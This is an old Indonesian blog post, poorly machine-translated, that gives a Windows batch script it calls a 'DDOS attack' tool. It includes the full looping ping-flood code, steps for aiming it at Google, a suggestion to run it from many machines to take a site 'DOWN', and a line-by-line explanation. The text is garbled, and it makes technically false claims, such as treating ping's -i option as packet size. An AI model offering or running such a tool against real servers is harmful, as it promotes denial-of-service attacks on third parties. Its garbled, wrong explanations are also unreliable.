Create a DDOS attack from NOTEPAD
Sabtu, 19 Februari 2011
0
komentar
---------------
Stage production
---------------
The one in need in the manufacture of this is
1.Notepad
2.copy this script to notepad
@echo off3. save with the extension batchfile
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
For example: DDOS.bat
----------
How To Use
----------
On-Target Server menu entries
web address you want in DDOS
for example like this:
This choice of target on the web who want to enter in DDOS, in the example here we want to try to DDOS Google site, after that press "ENTER" results like these . .
if successfully pulled PING, Ip produced "209.87.175.104" Ip is that we shall enter in the IP Host.
then input the results of the ping ip ip host earlier in the Packet Size and for it to send how many bytes so the size of Size up to you.
for example like this.
here I try to send 100 000 bytes to the IP 209.85.175.104
then press "ENTER" results like these
imagine if you tried something similar with the help of 30 computers or 100 servers can be "DOWN".
if you like the picture above means the process is successful DDOS you want to run depending on how long DDOS.
-----------
Explanation
-----------
Time to explain the source code
@ Echo off
Causes the command is not displayed when implemented / in the execute67.16 mode
Establish a command prompt on the screen width size "67" high-dah "16"
title DDOS Attack
create a title with the name ""
color 0a
create a color display,CLS
the numbers 0 -> to create a Black background and a-> to make writing a Green Light
clean the screen so that a command likeecho
@ Echo off
67.16 mode
title DDOS Attack
color 0a
not in the show
will display a blank line
echo.
to signal longkap
Ä
make a straight lineecho.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
With DDOS echo Batchfile
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set / p x = Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping% x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
mean the result of "Server-Target:" will be in state x after that x will be at Ping@ Ping.exe 127.0.0.1-n 5-w 1000> nul
goto Next
give as much as 5 second pause time and forwarded to the Next: Next
echo.
echo.
echo.
set / p y = ip Host:
echo.
set / p z = Packet Size:
echo.
after the Next,: DDOS
the "ip Host:" will be in state y and the "Packet Size:" will be in state z
then forwarded on to the DDOS
color 0c
make a bright red color
echo attacking Server% y%
ping% y%-i% z%-t> nul
goto DDOS
means that after entering the value of y and z values
y value will result in capacity in% y%
and knowl PING the value of y and shipment size in the state in which
z value after a successful move on to: DDOS
by using goto (loop)
Good luck. . .
Hopefully useful. . . (^_^)
TERIMA KASIH ATAS KUNJUNGAN SAUDARA
Judul: Create a DDOS attack from NOTEPAD
Ditulis oleh Unknown
Rating Blog 5 dari 5
Semoga artikel ini bermanfaat bagi saudara. Jika ingin mengutip, baik itu sebagian atau keseluruhan dari isi artikel ini harap menyertakan link dofollow ke https://androidjones7.blogspot.com/2011/02/create-ddos-attack-from-notepad.html. Terima kasih sudah singgah membaca artikel ini.Ditulis oleh Unknown
Rating Blog 5 dari 5
0 komentar:
Posting Komentar